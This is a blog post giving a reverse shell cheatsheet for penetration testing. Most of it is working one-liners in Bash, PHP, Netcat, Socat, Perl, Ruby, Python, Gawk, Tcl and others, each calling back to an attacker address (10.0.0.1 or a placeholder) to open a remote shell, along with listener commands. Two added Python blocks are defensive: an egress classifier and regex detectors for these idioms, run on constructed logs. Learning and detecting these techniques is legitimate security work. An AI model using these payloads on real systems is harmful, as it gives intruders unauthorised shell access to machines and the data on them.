
Reverse Shell Cheatsheet

During penetration testing we may be lucky enough to exploit a command-execution vulnerability. Soon after, we want an interactive shell so we can penetrate deeper. Some approaches rely on a “login” mechanism, such as adding a new account, an SSH key, or a .rhosts file. If none of these is viable, the next hop is a shell: either a reverse shell or a shell bound to a TCP port. As the title states, we will discuss the former.

Below we curate reverse shells that use various programming languages or tools present on the target machine.

Listening Home

Most network firewall egress filters allow

  • http (tcp port 80)
  • https (tcp port 443)
  • dns (tcp/udp port 53)
  • smtp (tcp port 25)
  • ping (icmp requests and echo replies)

While this is not always true, it can be our initial attempt: put the listening socket on one of those ports. Remember that a reverse shell needs a “home”, something on our machine that listens for and communicates with the reverse shell.

The simplest trick at our disposal is using netcat to listen on a socket. Most likely netcat is installed by default.

nc -vlp 13510

Or, if we are using socat, we can use this:

socat READLINE,history:/tmp/history.cmds TCP4-LISTEN:13510

Or we can set up a redirector on a public-facing machine that forwards the traffic to our system.
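The point of the port list above cuts both ways: because egress filters commonly leave 80, 443, 53 and 25 open, blocking by destination port alone does not stop a reverse shell, and a defender has to look at which process opened the connection. The following is an added example (not code from the original post) that applies that idea to a constructed, hypothetical connection-log format (`comm=... pid=... dst=ip:port proto=...`); the log lines, the process allowlists and the verdict names are all assumptions made for this example, and the parser would be swapped for your own EDR, auditd or conntrack output.

```python
"""Flag outbound connections initiated by shells and interpreters.

Added example, not from the original post: port-based egress filtering alone
does not stop a reverse shell that dials out on 80/443/53/25, so correlate the
originating process with the destination port. The log format and all sample
lines are constructed for this example.
"""
import re
from typing import Dict, List

# Ports that typical egress filters leave open (as listed in the post).
COMMON_EGRESS_PORTS = {80, 443, 53, 25}

# Programs the reverse shells on this page run from; on a server none of them
# should normally initiate outbound TCP sessions at all.
SHELL_LIKE = {
    "bash", "sh", "dash", "nc", "ncat", "netcat", "socat", "telnet", "xterm",
    "python", "python3", "perl", "ruby", "php", "tclsh", "gawk", "awk", "java",
}

# Clients that legitimately talk to those ports; tune this per host (assumption).
EXPECTED_CLIENTS = {"curl", "wget", "apt", "postfix", "systemd-resolved"}

# Constructed record layout: comm=<process> pid=<n> dst=<ip>:<port> proto=<tcp|udp>
LINE_RE = re.compile(
    r"comm=(?P<comm>\S+)\s+pid=(?P<pid>\d+)\s+"
    r"dst=(?P<dst>[\d.]+):(?P<port>\d+)\s+proto=(?P<proto>\w+)"
)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one connection record into a dict (empty dict if it does not match)."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else {}


def classify(event: Dict[str, str]) -> str:
    """Return a verdict for one parsed event.

    'reverse-shell-candidate' : a shell or interpreter dialing out, on any port
    'unexpected-client'       : an unknown program using a commonly open egress port
    'ok'                      : everything else
    """
    comm = event.get("comm", "")
    port = int(event.get("port", 0))
    if comm in SHELL_LIKE:
        return "reverse-shell-candidate"
    if port in COMMON_EGRESS_PORTS and comm not in EXPECTED_CLIENTS:
        return "unexpected-client"
    return "ok"


def suspicious_egress(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed events that are not 'ok', each annotated with its verdict."""
    flagged = []
    for line in lines:
        ev = parse_event(line)
        if not ev:
            continue
        verdict = classify(ev)
        if verdict != "ok":
            ev["verdict"] = verdict
            flagged.append(ev)
    return flagged


# Constructed sample records (not real telemetry).
SAMPLE_LOG = [
    "comm=curl pid=4101 dst=203.0.113.10:443 proto=tcp",
    "comm=bash pid=4222 dst=10.0.0.1:443 proto=tcp",
    "comm=python3 pid=4310 dst=10.0.0.1:13510 proto=tcp",
    "comm=nginx pid=1200 dst=198.51.100.7:80 proto=tcp",
    "comm=systemd-resolved pid=600 dst=192.0.2.53:53 proto=udp",
]

if __name__ == "__main__":
    for ev in suspicious_egress(SAMPLE_LOG):
        print(f"{ev['verdict']:24} {ev['comm']:16} -> {ev['dst']}:{ev['port']}")
```

Run against the sample, the `bash` and `python3` records are reported as reverse-shell candidates regardless of port (443 and the post's 13510), `curl` and `systemd-resolved` pass, and `nginx` surfaces as an unexpected client on port 80, which is exactly the kind of hit you resolve by extending `EXPECTED_CLIENTS` for that host rather than by widening the port filter.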

Reverse Shell

Bash

exec 5<>/dev/tcp/10.0.0.1/13510
cat <&5 | while read line; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/10.0.0.1/13510 0>&1

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/10.0.0.1/13510; sh <&196 >&196 2>&196

TCLsh

#!/usr/bin/tclsh
set s [socket <IP> <PORT>];
while {42} {
  puts -nonewline $s "shell>";
  flush $s;
  gets $s c;
  set e "exec $c";
  if {![catch {set r [eval $e]} err]} {
    puts $s $r;
  }
  flush $s;
}
close $s;

echo 'set s [socket <IP> <PORT>];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

PHP

php -r '$sock=fsockopen("10.0.0.1",13510);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",13510);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",13510);`/bin/sh -i <&3 >&3 2>&3`;'

php -r '$sock=fsockopen("10.0.0.1",13510);system("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",13510);popen("/bin/sh -i <&3 >&3 2>&3");'

Netcat

nc -e /bin/sh 10.0.0.1 13510

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 13510 >/tmp/f

/bin/sh | nc 10.0.0.1 13510

Socat

socat TCP:10.0.0.1:13510 EXEC:/bin/bash

socat OPENSSL:10.0.0.1:13510 EXEC:/bin/bash,pty

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 0/tmp/p
telnet 10.0.0.1 80 | /bin/bash | telnet 10.0.0.1 0 443

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=13510;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

for Windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:13510");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",13510).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1","13510");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","13510");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Java (Groovy syntax)

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/13510;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk

#!/usr/bin/awk -f
BEGIN {
   s = "/inet/tcp/0/10.0.0.1/13510"
   while(42) {
      do{
         printf "shell>" |& s
         s |& getline c
         if(c){
            while ((c |& getline) > 0)
               print $0 |& s
            close(c)
         }
      } while(c != "exit")
      close(s)
   }
}

awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/13510"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

xterm

One of the simplest reverse shells.

xterm -display :13510

To catch an incoming reverse shell in an xterm session:

xterm -display 10.0.0.1:1
Xnest :1
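Each of the sections above (Bash, PHP, Netcat, Socat, Perl, Ruby, Python, Gawk, Tcl) is one idiom, and every idiom leaves a recognisable shape in process command-line telemetry. The block below is an added example (not code from the original post) that turns those shapes into detection patterns and runs them over a constructed, hypothetical audit-log format (`<timestamp> uid=<n> cmd=<command line>`); the technique names, the log format and all sample lines are assumptions made for this example, and the regexes are deliberately narrow so that ordinary administration commands do not match.

```python
"""Flag process command lines that match the reverse-shell idioms on this page.

Added example, not from the original post. Each pattern covers one technique
family from the cheatsheet: bash /dev/tcp redirection, netcat -e, the
mkfifo|nc pipeline, socat EXEC:, interpreter one-liners that open a socket and
hand its descriptors to /bin/sh, gawk's /inet/tcp/ special file and the Tcl
socket/exec loop. The audit-log format and sample lines are constructed.
"""
import re
from typing import Dict, List, Tuple

# technique name -> regex over the full command line (dict order is reporting order)
PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "bash-devtcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "netcat-exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[a-z]*e\s*/bin/(?:ba)?sh"),
    "mkfifo-pipe": re.compile(r"mkfifo\s+\S+.*\|\s*(?:nc|ncat|netcat)\b"),
    "socat-exec": re.compile(r"\bsocat\b.*\b(?:TCP|OPENSSL):\S+\s+EXEC:"),
    "socket-to-shell": re.compile(
        r"\b(?:python3?|perl|ruby|php)\b.*"
        r"(?:socket|fsockopen|TCPSocket|IO::Socket).*"
        r"(?:dup2|/bin/sh|/bin/bash|popen|exec)"
    ),
    "gawk-inet": re.compile(r"\b(?:gawk|awk)\b.*/inet/tcp/"),
    "tcl-socket-exec": re.compile(r"\[socket\s+\S+\s+\S+\].*\bexec\b"),
}

# Constructed record layout: <timestamp> uid=<n> cmd=<command line>
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+uid=(?P<uid>\d+)\s+cmd=(?P<cmd>.*)$")


def match_techniques(cmdline: str) -> List[str]:
    """Return the names of every technique pattern that matches one command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmdline)]


def scan_log(lines: List[str]) -> List[Tuple[str, int, List[str]]]:
    """Return (timestamp, uid, techniques) for each record that hits a pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        found = match_techniques(m.group("cmd"))
        if found:
            hits.append((m.group("ts"), int(m.group("uid")), found))
    return hits


# Constructed sample records (not real telemetry); uid 33 is a web-server account.
SAMPLE_AUDIT = [
    "2024-05-01T10:00:01Z uid=33 cmd=ls -la /var/www",
    "2024-05-01T10:00:07Z uid=33 cmd=bash -i >& /dev/tcp/10.0.0.1/13510 0>&1",
    "2024-05-01T10:01:15Z uid=33 cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 13510 >/tmp/f",
    "2024-05-01T10:02:30Z uid=1000 cmd=nc -zv db.internal 5432",
    "2024-05-01T10:03:02Z uid=33 cmd=python3 -m http.server 8000",
]

if __name__ == "__main__":
    for ts, uid, techniques in scan_log(SAMPLE_AUDIT):
        print(f"{ts} uid={uid} {', '.join(techniques)}")
```

Two records in the sample are reported: the bash one-liner as `bash-devtcp` and the named-pipe pipeline as `mkfifo-pipe`; the port scan with `nc -zv`, the directory listing and the Python HTTP server pass, which is the behaviour you want before wiring a rule like this into an alerting pipeline, since `nc` and `python` alone are far too common to key on.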


The post Reverse Shell Cheatsheet appeared first on Xathrya.ID.